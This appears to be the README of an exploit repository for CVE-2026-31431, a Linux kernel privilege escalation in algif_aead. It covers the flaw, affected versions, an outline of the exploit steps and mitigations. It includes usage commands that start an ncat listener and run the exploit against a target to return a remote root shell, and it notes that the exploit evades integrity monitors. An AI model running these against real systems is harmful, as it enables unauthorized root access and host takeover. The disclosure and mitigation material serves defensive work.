Copy Fail is a high-severity local privilege escalation (LPE) vulnerability in the Linux kernel's cryptographic subsystem (algif_aead). Discovered and disclosed by Theori (via their Xint Code AI-assisted vulnerability research tool) on April 29, 2026, the flaw allows any unprivileged local user to write 4 controlled bytes into the page cache of any readable file — and leverage that to obtain root on virtually every major Linux distribution shipped since 2017.
A working proof-of-concept exploit is only ~732 bytes of Python.
- Start Ncat Listener

  ```bash
  sudo ncat -lvnp PORT
  ```

- Execute the exploit on target machine

  ```bash
  # Using Python script
  python3 CVE-2026-31431-Exploit.py IP PORT
  # Compiled binary
  chmod +x CVE-2026-31431-Exploit
  ./CVE-2026-31431-Exploit IP PORT
  ```

| Field | Detail |
|---|---|
| CVE ID | CVE-2026-31431 |
| CVSS Score | 7.8 (HIGH) |
| Type | Local Privilege Escalation (LPE) |
| Component | algif_aead — Linux kernel AF_ALG userspace crypto interface |
| Root Cause | Logic flaw in the authencesn AEAD template; an in-place optimization (commit 72548b093ee3, Aug 2017) causes page-cache pages to appear in the kernel's writable destination scatterlist |
| Primitive | 4-byte controlled write into the page cache of any readable file |
| Exploit Mechanism | AF_ALG socket → splice() → page-cache corruption of a setuid binary → root |
| Race Condition? | ❌ None — straight-line logic flaw, 100% reliable |
| Kernel Offset Needed? | ❌ No |
| Fix Commit | fafe0fa2995a (reverts the 2017 optimization) |
- Open an `AF_ALG` socket and bind to `authencesn(hmac(sha256),cbc(aes))`
- Splice a readable setuid binary's pages into the socket
- The kernel's AEAD scratch write overwrites 4 bytes in the page cache of that binary
- Execute the now-corrupted setuid binary → root shell
- No race window — deterministic, works every time
- No kernel offset / KASLR bypass needed
- Same exploit works across distros — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, etc.
- Container escape — the page cache is shared; a write from inside a container affects the host
- No disk modification — file-integrity monitors (AIDE, OSSEC, etc.) won't detect it
- No forensic trace on disk
| Affected | Not Affected |
|---|---|
| Linux kernel 4.14 through 7.0-rc | Kernels prior to 4.14 (before Aug 2017 commit) |
| All 6.18.x prior to 6.18.22 | 6.18.22+ (patched) |
| All 6.19.x prior to 6.19.12 | 6.19.12+ (patched) |
- Ubuntu 24.04 LTS
- Amazon Linux 2023
- RHEL 10.1
- SUSE 16
- Rocky Linux 9.7
Essentially every major Linux distribution released since 2017 is affected.
Update your kernel to a version containing fix commit fafe0fa2995a. Most major distributions have released or are releasing updated kernel packages.
If you cannot patch immediately:
- Block AF_ALG socket creation via seccomp policy
- Blacklist the `algif_aead` module:

  ```bash
  echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
  sudo modprobe -r algif_aead 2>/dev/null
  ```

This repository is for educational and defensive purposes only. The information here is intended to help security teams understand, detect, and mitigate CVE-2026-31431. Always follow responsible disclosure practices and applicable laws.